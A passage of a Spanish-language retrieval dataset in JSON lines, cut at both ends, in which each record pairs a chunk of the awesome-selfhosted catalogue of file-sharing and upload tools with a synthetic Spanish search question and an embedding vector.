0.07865, -0.04408, -0.00497, -0.01603, -0.06551, 0.05473, -0.01392, -0.03928, 0.04287, -0.06107, -0.01927, 0.09399, -0.00386, -0.04206, 0.13558, -0.1189, 0.05578, -0.04202, 0.08275, -0.05826, 0.04643, -0.05679, -0.03862, -0.00649, -0.06541, -0.02795, -0.08629, 0.08918, 0.03477, -0.00479, 0.01576, 0.04448, -0.03399, 0.04999, -0.01865, 0.06189, -0.08117, -0.04613, 0.02922, -0.10015, 0.00496, -0.09142, 0.05623, -0.00774, -0.08018, -0.12751, -0.00255, 0.05945, 0.06144, -0.02056, -0.05457, 0.08305, -0.09142, 0.0337, -0.00392, 0.06858, 0.07413, 0.01416, 0.03646, 0.02263, -0.12218, 0.01515, 0.09862, -0.01883, -0.10906, 0.01861, -0.02165, -0.06335, -0.03672, 0.04373, 0.10315, -0.03262, -0.04489, 0.03763, 0.05518, -0.01915, 0.04103, 0.02403, -0.06416, -0.07227, 0.00095, -0.03486, -0.05696, -0.05162, -0.01311, 0.02674, -0.0014, -0.04488, 0.00058, -0.03958, 0.01755, 0.01616, 0.04165, 0.00554, 0.01963, 0.1123, 0.02238, 0.00197, -0.02152, 0.01406, -0.03518, 0.03484, -3e-05, 0.01206, 0.03595, 0.04057, 0.03649, -0.05343, -0.02929, 0.01585, -0.00937, 0.03735, 0.0036, -0.0096, 0.04766, -0.00507, -0.04582, -0.0407, -0.02586, 0.02321, -0.0188, 0.03729, -0.01297, 0.00364, 0.01665, -0.00772, -0.09437, -0.08143, 0.05348, -0.00643, -0.02768, -0.08202, -0.03188, -0.07473, 0.01186, -0.00034, -0.01165, -0.04912, 0.05034, 0.0201, 0.00992, 0.0104, 0.05296]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: Gokapi β€” Lightweight server to share files, which expire after a set amount of downloads or days. Similar to the discontinued Firefox Send, with the difference that only the admin is allowed to upload files [GPL-3.0, Go/Docker]. goploader β€” Easy file sharing with server-side encryption, curl/httpie/wget compliant [MIT, Go]. GoSƐ β€” Modern file-uploader focusing on scalability and simplicity. It only depends on a S3 storage backend and hence scales horizontally without the need for additional databases or caches [Apache-2.0, Go/Docker]. Jirafeau β€” One-click-fileshare project. Select your file, upload, and share a link. That's it [AGPL-3.0, PHP/Docker]. OnionShare β€” Securely and anonymously share a file of any size [GPL-3.0, Python/deb]. PicoShare β€” Minimalist, easy-to-host service for sharing images and other files [AGPL-3.0, Go/Docker]. Picsur β€” Simple imaging hosting platform that allows you to easily host, edit, and share images [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a Firefox Send para subir documentos rΓ‘pidamente?", "v": [-0.09024, 0.07289, -0.14655, -0.08997, -0.0691, -0.08945, -0.06053, -0.12835, -0.09779, -0.09393, -0.10331, -0.12793, -0.06846, -0.12834, 0.08627, -0.15704, 0.06453, -0.05168, 0.11555, -0.05971, 0.06465, 0.04288, -0.06255, -0.23101, -0.00744, -0.10246, -0.04511, -0.01684, -0.0203, -0.13566, 0.1537, 0.01147, 0.0026, 0.11649, -0.12451, 0.11189, 0.20882, 0.02157, 0.01321, -0.06869, 0.04461, 0.07384, -0.0957, 0.10056, -0.17181, -0.05401, -0.11653, 0.0105, 0.11781, 0.00932, 0.08509, -0.08647, -0.0241, 0.04074, -0.11145, 0.01717, 0.14121, -0.18734, -0.01371, -0.07305, -0.0203, -0.01749, -0.03644, -0.0534, 0.00423, -0.03109, 0.01416, -0.00978, -0.07436, 0.05095, 0.0175, -0.04347, -0.02743, 0.03891, -0.14018, 0.06603, -0.09895, -0.03561, -0.02649, 0.12625, 0.03506, -0.02623, -0.05843, 0.05023, -0.06168, -0.11657, -0.01304, -0.07747, 0.03805, 0.06519, 0.10779, 0.01314, 0.02364, 0.0552, 0.0398, -0.0693, 0.0428, 0.00697, -0.00802, -0.01282, -0.02376, 0.02352, -0.04849, 0.05627, 0.01766, -0.0206, -0.06108, 0.00099, -0.08462, 0.10071, 0.00213, 0.03635, 0.02063, 0.03022, -0.00775, -0.08709, -0.04408, -0.0121, -0.04223, -0.04189, -0.02467, -0.01613, -0.04193, -0.0698, 0.04684, 0.02375, 0.06011, 0.0045, -0.08638, 0.02802, 0.08164, -0.04645, -0.12024, -0.06505, -0.08776, -0.05218, 0.04259, -0.04425, 0.05861, -0.03627, 0.00493, -0.06017, -0.05848, 0.0148, 0.02762, -0.03489, -0.06024, -0.01542, -0.03185, -0.11978, -0.02311, -0.02913, 0.03393, 0.02111, 0.01294, -0.0159, -0.02569, 0.03734, -0.10511, 0.02194, 0.05273, -0.00205, 0.0318, 0.07634, -0.03691, 0.0084, -0.01039, 0.07596, -0.04051, -0.03934, 0.02145, 0.01871, 0.04305, -0.1051, 0.06928, -0.05237, -0.01805, -0.0126, -0.00307, 0.04513, 0.01703, 0.02412, -0.02575, 0.03138, -0.04277, -0.04216, 0.01866, -0.05398, 0.00734, 0.01727, -0.05923, 0.00218, -0.07111, -0.02831, -0.0136, 0.01433, -0.03629, -0.05483, -0.01544, -0.00814, -0.06327, -0.07554, -0.00297, -0.01549, -0.03537, -0.04872, -0.02306, 0.01355, 0.03396, 0.03922, -0.01079, 0.01169, 0.06348, 0.01993, -0.04828, 0.01253, 0.02642, 0.01972, 0.00387, -0.06228, 0.0482, 0.01001, -0.01569, -0.01851, 0.02067, -0.03561, 0.02515, 0.05619, -0.02765, -0.0245, -0.01128, 0.00077, 0.01138, 0.03106, 0.01453, -0.01342, 0.01467, 0.02118, -0.01762, -0.036, -0.00424, 0.05906, 0.00461, 0.00937, -0.06372, 0.03806, -0.05172, -0.01223, -0.0063, 0.00791, -0.03139, -0.00327, 0.01628, 0.0061, 0.00867, -0.03221]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: Gokapi β€” Lightweight server to share files, which expire after a set amount of downloads or days. Similar to the discontinued Firefox Send, with the difference that only the admin is allowed to upload files [GPL-3.0, Go/Docker]. goploader β€” Easy file sharing with server-side encryption, curl/httpie/wget compliant [MIT, Go]. GoSƐ β€” Modern file-uploader focusing on scalability and simplicity. It only depends on a S3 storage backend and hence scales horizontally without the need for additional databases or caches [Apache-2.0, Go/Docker]. Jirafeau β€” One-click-fileshare project. Select your file, upload, and share a link. That's it [AGPL-3.0, PHP/Docker]. OnionShare β€” Securely and anonymously share a file of any size [GPL-3.0, Python/deb]. PicoShare β€” Minimalist, easy-to-host service for sharing images and other files [AGPL-3.0, Go/Docker]. Picsur β€” Simple imaging hosting platform that allows you to easily host, edit, and share images [AGPL-3.0, Docker].", "indexar": "con que puedo montar un servicio simple para transferir imΓ‘genes sin necesidad de bases de datos?", "v": [0.04782, 0.15551, -0.2013, -0.15761, -0.09445, -0.08697, -0.01969, -0.00658, -0.13344, -0.0522, -0.09027, -0.11968, 0.02047, -0.08508, 0.01367, 0.02482, 0.02931, -0.07788, 0.05602, -0.07821, 0.04753, -0.00807, -0.00493, -0.08674, -0.1169, 0.09337, -0.01437, -0.05975, -0.18286, 0.10083, 0.04671, -0.01076, 0.04566, 0.09838, -0.01877, -0.11981, -0.0206, 0.0519, -0.0065, -0.07734, -0.0335, -0.01013, -0.00737, 0.15324, -0.00919, -0.04722, -0.03377, -0.04822, 0.05802, -0.04357, 0.10155, -0.00556, -0.15604, -0.08309, -0.12352, -0.11466, 0.1396, -0.11511, 0.04312, 0.07014, 0.00383, 0.10208, -0.00879, 0.0934, 0.06977, 0.0035, -0.02407, 0.0615, -0.12991, 0.02612, -0.00044, 0.05951, -0.01373, -0.03157, -0.07308, -0.05446, -0.01461, -0.08639, -0.08412, 0.03637, 0.02553, 0.02701, -0.05661, 0.01687, -0.06004, 0.03634, 0.0081, -0.03138, 0.04999, -0.04192, 0.11578, 0.07198, 0.07257, 0.01561, 0.0709, 0.01518, -0.0866, 0.0763, 0.04407, -0.00277, -0.03109, 0.0401, -0.02263, 0.09049, 0.01397, 0.0303, 0.19232, -0.10159, -0.04916, -0.1213, 0.00781, -0.05085, -0.01512, -0.00063, -0.0575, -0.09704, -0.01573, -0.00387, -0.04511, 0.03245, 0.01602, -0.0395, 0.1179, 0.01755, -0.01585, -0.07107, -0.02338, 0.07566, -0.02249, 0.05209, -0.04679, 0.00792, -0.10635, -0.06139, 0.01799, 0.03504, 0.03365, -0.06887, 0.00703, -0.08591, -0.03312, 0.04803, -0.04727, -0.07222, 0.017, 0.05851, 0.06144, -0.03654, -0.08544, -0.00015, 0.02703, 0.08796, 0.01639, 0.07631, -0.03021, 0.00779, 0.02772, -0.07896, -0.03478, 0.01258, -0.03074, 0.07127, 0.04492, 0.01853, -0.0468, -0.0779, -0.00422, -0.01763, 0.02336, 0.03772, -0.05205, 0.01831, -0.0318, -0.06208, 0.07966, 0.0526, -0.0899, -0.08537, -0.03054, 0.02428, 0.02091, -0.02103, 0.00138, 0.06101, 0.04114, 0.00635, -0.04598, 0.01838, -0.01489, -0.02574, -0.02531, 0.02828, 0.01083, 0.03719, 0.08537, -0.0885, -0.08536, 0.05021, 0.05837, -0.01947, -0.06528, -0.00696, -0.00283, -0.01186, -0.00988, 0.01104, -0.02398, 0.07064, -0.0278, -0.01561, -0.02441, -0.00367, 0.0584, -0.10925, -0.02328, -0.00588, 0.04121, -0.05641, -0.03119, 0.06394, -0.03778, 0.04425, 0.01916, 0.02963, -0.02352, 0.05315, 0.01974, 0.01056, 0.02852, -0.0115, 0.01411, 0.10207, 0.01967, -0.03158, 0.0594, -0.01123, -0.04515, -0.05904, -0.02921, -0.04942, 0.03569, 0.07007, -0.06931, -0.00506, -0.01621, -0.01629, -0.11727, 0.02554, 0.0124, -0.13594, 0.00689, 0.00628, 0.00732, -0.04191, -0.00629, -0.06199]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: PictShare β€” Multi lingual image hosting service with a simple resizing and upload API [Apache-2.0, PHP/Docker]. Pingvin Share X β€” File sharing platform with support for logins, reverse shares, share expiry, S3 Buckets, advanced authentication, ClamAV for security scans and more (fork of Pingvin Share) [BSD-2-Clause, Docker/Nodejs]. Plik β€” Scalable and friendly temporary file upload system [MIT, Go/Docker]. ProjectSend β€” Upload files and assign them to specific clients you create. Give access to those files to your clients [GPL-2.0, PHP]. PsiTransfer β€” Simple file sharing solution with robust up-/download-resume and password protection [BSD-2-Clause, Nodejs]. QuickShare β€” Quick and simple file sharing between different devices [LGPL-3.0, Docker/Go]. Safebucket β€” File sharing platform with pluggable infrastructure, where uploads and downloads go directly between clients and S3-compatible storage [Apache-2.0, Go/Docker].", "indexar": "que programa sirve para compartir archivos de forma rΓ‘pida entre distintos dispositivos", "v": [0.02358, 0.12917, -0.15559, -0.2858, 0.03203, -0.14101, -0.0121, -0.0902, 0.0014, -0.1052, -0.0007, -0.13072, -0.01928, -0.11489, 0.09114, -0.05236, 0.1381, -0.0831, 0.11096, -0.02862, 0.01059, 0.04751, -0.0305, -0.08252, -0.04768, -0.00501, 0.06927, 0.07147, -0.17103, 0.01066, 0.02326, -0.01161, 0.09244, -0.04085, -0.1453, -0.02647, 0.07072, 0.05723, -0.12024, 0.01551, -0.02691, 0.03395, -0.04305, 0.02901, 0.02711, -0.03035, -0.02479, 0.00285, 0.00681, 0.02995, -0.0258, 0.0677, -0.01287, 0.07675, -0.10955, -0.09668, 0.00768, -0.21442, -0.04739, -0.00144, -0.04685, -0.01564, -0.06732, -0.08669, -0.00286, 0.01974, -0.04363, 0.08081, -0.1482, -0.00029, 0.01128, 0.01909, 0.07116, -0.0206, -0.05766, 0.10973, -0.09157, -0.0219, -0.00345, -0.02861, 0.0857, -0.02236, 0.06928, -0.00597, -0.02993, 0.01074, 0.05653, 0.02939, -0.02479, -0.00526, 0.02845, 0.07213, 0.03023, 0.03309, 0.03567, -0.05496, 0.07928, 0.07342, 0.04251, 0.03963, 0.07689, -0.01594, -0.11216, 0.10077, -0.09171, 0.10492, -0.00929, 0.02751, 0.00564, -0.00853, 0.05882, 0.01621, 0.04649, 0.04807, -0.1119, 0.01883, -0.00181, -0.08945, 0.01206, -0.01669, -0.06186, 0.03046, -0.0076, 0.00878, 0.16091, 0.02912, -0.01823, 0.08139, -0.03896, 0.11674, 0.08971, -0.0136, -0.00661, 0.0335, -0.08413, -0.10355, 0.04229, 0.00248, -0.02464, -0.0878, 0.14746, 0.0234, -0.01593, -0.01722, 0.03461, -0.00538, 0.06806, -0.0281, 0.01642, -0.02195, -0.03738, -0.01037, -0.05838, -0.07914, -0.08996, -0.02042, -0.02111, -0.10015, -0.1354, 0.0588, -0.09617, 0.04447, -0.03944, -0.00607, -0.01448, -0.09445, 0.01937, 0.01182, 0.14587, 0.04153, -0.01334, 0.0805, 0.02111, -0.05009, -0.02505, 0.07797, -0.03635, -0.05605, 0.06036, -0.04822, -0.08343, 0.03323, -0.00238, 0.0491, -0.00422, -0.04127, -0.02106, 0.07528, -0.02988, 0.02975, 0.02144, 0.02064, 0.0079, 0.02896, -0.00489, -0.04903, -0.05473, 0.00188, 0.03805, 0.01042, -0.06841, -0.03718, 0.00512, 0.03516, 0.03218, 0.04769, -0.02673, -0.00757, 0.08918, 0.05467, -0.01983, -0.01027, 0.08264, -0.00082, -0.01102, -0.03993, -0.00454, 0.04774, 0.07525, 0.00452, 0.02738, -0.00099, -0.00755, 0.03938, 0.01789, 0.0047, 0.00186, 0.00238, -0.01567, -0.06451, 0.00832, -0.02871, 0.02806, -0.01567, 0.05421, -0.01154, -0.01459, -0.04114, 0.00595, -0.04732, -0.04267, 0.05845, 0.02428, -0.00674, -0.06536, 0.03366, -0.05691, -0.04379, -0.00941, -0.03569, -0.03929, 0.06786, 0.04553, 0.01458, -0.00711, 0.05085]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: PictShare β€” Multi lingual image hosting service with a simple resizing and upload API [Apache-2.0, PHP/Docker]. Pingvin Share X β€” File sharing platform with support for logins, reverse shares, share expiry, S3 Buckets, advanced authentication, ClamAV for security scans and more (fork of Pingvin Share) [BSD-2-Clause, Docker/Nodejs]. Plik β€” Scalable and friendly temporary file upload system [MIT, Go/Docker]. ProjectSend β€” Upload files and assign them to specific clients you create. Give access to those files to your clients [GPL-2.0, PHP]. PsiTransfer β€” Simple file sharing solution with robust up-/download-resume and password protection [BSD-2-Clause, Nodejs]. QuickShare β€” Quick and simple file sharing between different devices [LGPL-3.0, Docker/Go]. Safebucket β€” File sharing platform with pluggable infrastructure, where uploads and downloads go directly between clients and S3-compatible storage [Apache-2.0, Go/Docker].", "indexar": "cual es una alternativa gratuita a Plik para subir y descargar archivos temporalmente", "v": [-0.01842, 0.11406, -0.12132, -0.0646, -0.01943, -0.04665, 0.04786, -0.10438, -0.06921, 0.02036, -0.05151, -0.10088, 0.02013, 0.03787, -0.02747, -0.11986, -0.00344, -0.00491, 0.20021, -0.03622, 0.04115, 0.05209, -0.04126, -0.14624, -0.04556, -0.05052, -0.05023, 0.03089, -0.11857, -0.03438, 0.03814, 0.04511, 0.087, -0.01681, -0.07537, 0.10102, 0.19929, 0.09971, 0.04696, -0.06389, 0.00872, 0.04357, -0.01773, 0.09468, -0.11003, -0.10524, 0.00677, 0.04649, 0.01369, 0.01827, -0.02393, 0.05354, -0.00226, 0.04567, -0.08361, -0.00846, 0.13436, -0.22625, -0.02456, -0.03859, -0.04227, 0.1508, 0.00196, -0.03139, -0.00613, 0.00043, -0.09541, 0.07364, -0.16294, 0.04372, 0.05931, 0.02027, 0.11821, -0.00384, -0.0948, 0.0214, -0.05103, -0.14189, -0.00436, -0.02251, 0.10458, -0.01597, 0.06977, 0.12033, -0.1387, -0.13661, 0.02177, -0.08298, 0.05686, 0.03346, 0.09549, -0.06353, 0.06739, 0.06221, -0.01735, -0.09212, 0.03575, -0.04874, -0.05529, 0.02051, 0.00573, -0.02575, 0.03118, 0.05442, 0.07438, 0.05404, -0.03737, 0.0835, -0.01507, 0.01587, 0.01712, 0.02757, 0.02623, 0.07235, -0.03302, -0.06225, 0.01165, -0.0398, -0.06437, -0.04201, 0.00144, 0.04552, -0.01381, -0.04755, 0.00468, 0.0152, 0.09815, 0.0064, -0.06819, 0.04062, 0.03983, -0.03037, -0.04296, -0.052, -0.14607, -0.12022, 0.12922, 0.00327, -0.04152, -0.04032, 0.0661, -0.036, -0.01283, 0.01914, 0.06716, -0.00773, -0.04578, -0.06493, 0.02327, -0.06907, -0.02609, 0.00028, 0.00228, 0.02001, 0.01051, 0.00856, 0.00816, -0.09255, -0.05777, 0.01765, 0.02877, -0.01306, 0.01958, -0.01992, -0.12578, -0.08834, 0.03427, -0.00839, -0.01346, 0.02572, 0.04499, 0.02597, -0.02095, -0.09052, 0.00808, -0.00925, -0.01796, -0.06842, 0.02925, -0.01789, 0.0155, 0.01171, 0.00063, -0.00473, -0.10537, -0.0731, 0.04896, 0.0263, 0.00772, 0.02239, -0.03711, -0.00804, -0.10649, 0.0001, -0.00147, -0.02252, -0.02284, -0.0942, -0.06424, 0.03561, -0.03284, -0.08652, -0.0803, -0.00297, 0.03834, -0.08106, 0.04042, 0.0681, 0.01159, 0.00074, -0.02829, 0.00952, 0.10203, -0.0287, 0.05142, 0.02698, -0.01688, -0.02144, -0.015, -0.04201, -0.03806, 0.0098, 0.08791, 0.04575, -0.03421, 0.0197, 0.01062, 0.08166, -0.03686, 0.04075, -0.02799, 0.06359, 0.06442, 0.02207, 0.04498, -0.00407, 0.03625, 0.0635, 0.02165, -0.00894, 0.02448, 0.08864, 0.02226, 0.06237, -0.10148, -0.03975, -0.00729, -0.00388, 0.0472, -0.0552, -0.03108, 0.07278, -0.0629, 0.00874, -0.02389, 0.01053]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: PictShare β€” Multi lingual image hosting service with a simple resizing and upload API [Apache-2.0, PHP/Docker]. Pingvin Share X β€” File sharing platform with support for logins, reverse shares, share expiry, S3 Buckets, advanced authentication, ClamAV for security scans and more (fork of Pingvin Share) [BSD-2-Clause, Docker/Nodejs]. Plik β€” Scalable and friendly temporary file upload system [MIT, Go/Docker]. ProjectSend β€” Upload files and assign them to specific clients you create. Give access to those files to your clients [GPL-2.0, PHP]. PsiTransfer β€” Simple file sharing solution with robust up-/download-resume and password protection [BSD-2-Clause, Nodejs]. QuickShare β€” Quick and simple file sharing between different devices [LGPL-3.0, Docker/Go]. Safebucket β€” File sharing platform with pluggable infrastructure, where uploads and downloads go directly between clients and S3-compatible storage [Apache-2.0, Go/Docker].", "indexar": "con que puedo montar un servicio simple de transferencia de archivos con autenticaciΓ³n y seguridad", "v": [0.09094, 0.07412, -0.18615, -0.17659, -0.10652, -0.05059, -0.04417, -0.00555, -0.11952, -0.03097, -0.16338, -0.11468, 0.11668, 0.02542, 0.04379, 0.0402, 0.0916, -0.00575, 0.10489, 0.05456, 0.05719, -0.03647, 0.05871, -0.15199, -0.00815, 0.06367, 0.04936, 0.06085, -0.13257, 0.01541, 0.06441, 0.04367, 0.0677, 0.11173, 0.02098, -0.05855, 0.02765, 0.1515, 0.05049, -0.00933, 0.01386, -0.07816, 0.06276, 0.11757, 0.03167, -0.01882, 0.1107, -0.0031, 0.08117, -0.01169, 0.02989, -0.09786, -0.16278, -0.06919, -0.1797, 0.04814, 0.05358, -0.07325, 0.0626, 0.01725, -0.09485, 0.08619, -0.05851, 0.08113, 0.08986, 0.01202, -0.02799, -0.00796, -0.15094, 0.02822, 0.0809, -0.01664, -0.00804, 0.08566, -0.09654, -0.05574, -0.047, -0.03835, -0.01648, 0.11263, 0.03135, 0.04217, 0.01211, -0.00615, -0.04756, -0.01561, -0.0421, -0.10121, 0.07308, 0.06261, 0.08902, 0.08127, 0.05893, 0.00594, 0.00949, -0.06245, 0.00054, 0.02033, -0.06377, -0.08824, -0.01472, 0.01002, 0.00333, 0.17367, 0.08822, 0.01184, 0.04073, 0.00348, 0.05356, -0.10859, -0.00943, 0.01178, -0.0244, 0.07774, -0.11757, -0.063, -0.03836, -0.03893, 0.01909, 0.00157, -0.03326, -0.04399, 0.09038, 0.0034, 0.05939, -0.01973, 0.0022, 0.12132, -0.06137, 0.00642, 0.03419, -0.03172, -0.16307, 0.00151, -0.02806, -0.02324, 0.01316, -0.09561, 0.01893, -0.0349, 0.08972, -0.01703, 0.00531, -0.02491, 0.03879, 0.06252, -0.014, -0.11661, -0.04384, -0.00509, -0.01668, 0.07144, -0.03013, 0.01921, -0.04835, 0.01472, -0.00615, -0.10131, -0.02029, 0.04694, 0.00984, 0.07755, 0.03553, -0.01109, -0.06336, -0.02733, 0.03727, 0.0021, 0.04079, -0.07009, -0.02657, 0.04434, 0.02134, -0.0503, 0.04109, 0.06707, -0.11924, -0.09054, 0.05253, -0.06206, 0.02887, -0.06781, -0.01795, 0.04562, 0.06535, -0.02396, 0.041, 0.0566, -0.03798, 0.04104, 0.01286, -0.01484, -0.10042, 0.06526, -0.02507, -0.03727, -0.01796, 0.00424, -0.02595, -0.00957, -0.00213, -0.0526, 0.0569, -0.01329, 0.04101, -0.00247, -0.03023, 0.05021, -0.02044, 0.02361, 0.01203, 0.0186, 0.11526, -0.0928, -0.00537, 0.00782, -0.00761, -0.01991, -0.05826, 0.07847, 0.00536, -0.03028, -0.01119, 0.02267, -0.01996, -0.00513, 0.00288, -0.032, 0.01756, -0.01006, 0.00427, 0.05099, -0.06826, 0.01492, 0.0617, 0.01422, -0.00795, -0.02954, -0.02597, -0.04508, 0.01112, 0.07682, -0.04079, -0.00442, -0.06026, 0.0171, -0.07946, 0.02431, 0.01292, -0.05927, 0.00332, 0.02168, -0.00388, -0.00033, 0.01487, -0.0665]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: sE2EEnd β€” End-to-end encrypted file sharing with password protection, download limits, and auto-expiration, integrated with Keycloak for authentication [AGPL-3.0, Docker]. Sharry β€” Share files easily over the internet between authenticated and anonymous users (both ways) with resumable up- and downloads [GPL-3.0, Scala/Java/deb/Docker]. Shifter β€” A simple, self-hosted file-sharing web app, powered by Django [MIT, Docker]. Slink β€” Image sharing platform designed to give users complete control over their media sharing experience [AGPL-3.0, Docker]. snowshare β€” File and link sharing platform with URL shortening, code snippet sharing, and file uploads, featuring customizable expiration, privacy settings, and QR codes [CC0-1.0, Nodejs/Docker]. transfer.sh β€” Easy file sharing from the command line [MIT, Go]. Uguu β€” Stores files and deletes after X amount of time [MIT, PHP].", "indexar": "que programa sirve para compartir archivos de forma segura y con encriptaciΓ³n entre usuarios?", "v": [-0.07441, -0.05344, -0.10983, -0.23368, 0.05802, -0.29173, -0.10912, -0.04444, 0.01045, -0.14821, -0.00316, -0.11772, 0.1228, -0.07618, 0.05175, -0.10644, 0.0801, -0.068, 0.10586, 0.03665, 0.05186, -0.03922, 0.02188, -0.11799, -0.11014, -0.03309, 0.01863, 0.09415, 0.00433, 0.06091, 0.03944, -0.03486, 0.07349, -0.00085, 0.00784, 0.03588, 0.01683, 0.03427, -0.01876, 0.15443, 0.02156, 0.00771, 0.00772, 0.03826, -0.00456, 0.04415, -0.03489, 0.00108, 0.10653, -0.05733, -0.08949, -0.10059, -0.09584, 0.02982, -0.07867, -0.05789, -0.05269, -0.21472, -0.04311, 0.01197, -0.12459, 0.03828, -0.02757, 0.02347, 0.00736, -0.06129, -0.00305, 0.05489, -0.18221, 0.12774, 0.08247, 0.06057, -0.04885, 0.04938, -0.02034, 0.02421, -0.04549, -0.03576, -0.02137, 0.05086, -0.00417, 0.03863, 0.05736, 0.01615, -0.12109, -0.01258, 0.01924, 0.04363, -0.01916, 0.01397, 0.05791, 0.05467, 0.05296, 0.04895, 0.03546, -0.06376, 0.07776, -0.0386, -0.05943, -0.04525, 0.05741, 0.01247, 0.00693, 0.10618, -0.04406, 0.06598, 0.01908, 0.04136, 0.03575, -0.06834, 0.07548, 0.08808, -0.03781, 0.00742, -0.10565, 0.02811, -0.04009, -0.04258, 0.09198, -0.0683, -0.02804, 0.06283, -0.07574, -0.01072, 0.09109, 0.06451, -0.04417, 0.13597, -0.11855, 0.03103, -0.01742, -0.01042, -0.0925, 0.05783, -0.09708, -0.07073, 0.04316, -0.02639, -0.04869, -0.02751, 0.07362, 0.06674, -0.03119, -0.0024, 0.06192, 0.00411, 0.04048, -0.05352, -0.01562, -0.04082, -0.03448, 0.04563, -0.05554, -0.06176, -0.06423, -0.00065, -0.01266, -0.09679, -0.10303, 0.04992, -0.0202, 0.03352, 0.0048, -0.03453, -0.00458, -0.05175, 0.04872, 0.03022, 0.03926, -0.00437, 0.05789, 0.04007, 0.06167, -0.08209, -0.0306, 0.03289, -0.02972, -0.08182, -0.00369, -0.03953, -0.03321, -0.03688, 0.01497, 0.07906, 0.0023, -0.05593, 0.02975, 0.07478, -0.04717, 0.0038, -0.02396, -0.01708, -0.04372, 0.0348, -0.05655, -0.03774, -0.00393, 0.05133, 0.02359, -0.00829, -0.01963, -0.02413, -0.00432, 0.07301, 0.01443, 0.01278, -0.01899, -0.04008, 0.09224, 0.02417, 0.04, -0.01962, 0.03317, -0.03447, -0.0125, -0.051, 0.01654, 0.08935, 0.02984, 0.01439, -0.0432, -0.01311, 0.02028, -0.00681, 0.0371, -0.05447, -0.01778, -0.01096, -0.00481, -0.04042, -0.00836, -0.00095, -0.01267, 0.04709, 0.07957, -0.02916, -0.06988, -0.00611, 0.00723, -0.11921, -0.08925, 0.06862, -0.00199, -0.07146, -0.03587, 0.01174, -0.04359, 0.00537, 0.00078, -0.01336, -0.04522, 0.01086, 0.03351, -0.00695, -0.02367, 0.03782]} +{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: sE2EEnd β€” End-to-end encrypted file sharing with password protection, download limits, and auto-expiration, integrated with Keycloak for authentication [AGPL-3.0, Docker]. Sharry β€” Share files easily over the internet between authenticated and anonymous users (both ways) with resumable up- and downloads [GPL-3.0, Scala/Java/deb/Docker]. Shifter β€” A simple, self-hosted file-sharing web app, powered by Django [MIT, Docker]. Slink β€” Image sharing platform designed to give users complete control over their media sharing experience [AGPL-3.0, Docker]. snowshare β€” File and link sharing platform with URL shortening, code snippet sharing, and file uploads, featuring customizable expiration, privacy settings, and QR codes [CC0-1.0, Nodejs/Docker]. transfer.sh β€” Easy file sharing from the command line [MIT, Go]. Uguu β€” Stores files and deletes after X amount of time [MIT, PHP].", "indexar": "con quΓ© puedo montar una plataforma privada para subir y descargar archivos que se borren despuΓ©s de un tiempo?", "v": [-0.10757, 0.12545, -0.13832, -0.10112, -0.14487, 0.00564, 0.06193, -0.0575, -0.09601, -0.18717, -0.1333, -0.0705, 0.11336, 0.00504, -0.03297, -0.01066, 0.02114, -0.03594, 0.10513, 0.02647, 0.02337, 0.00772, -0.01531, -0.14694, -0.02155, -0.08103, 0.0802, 0.01099, -0.18124, -0.04378, -0.00032, 0.09531, 0.03306, 0.10563, -0.04972, -0.04722, 0.08334, 0.06828, -0.04278, -0.09436, -0.00538, -0.01653, -0.00504, 0.09687, 0.00603, -0.04694, 0.00253, -0.04125, 0.05106, -0.04118, -0.03406, -0.035, 0.01761, 0.04854, -0.08304, -0.09434, 0.11308, -0.12432, 0.1008, 0.00067, -0.09343, 0.11586, 0.02773, 0.06138, -0.01744, -0.02408, -0.07845, 0.09968, -0.1834, 0.05245, 0.03755, -0.02094, -0.00459, 0.01627, -0.01109, 0.0695, 0.03012, -0.07053, -0.05314, -0.01847, 0.05021, -0.01177, -0.06322, 0.10601, -0.09944, -0.09404, 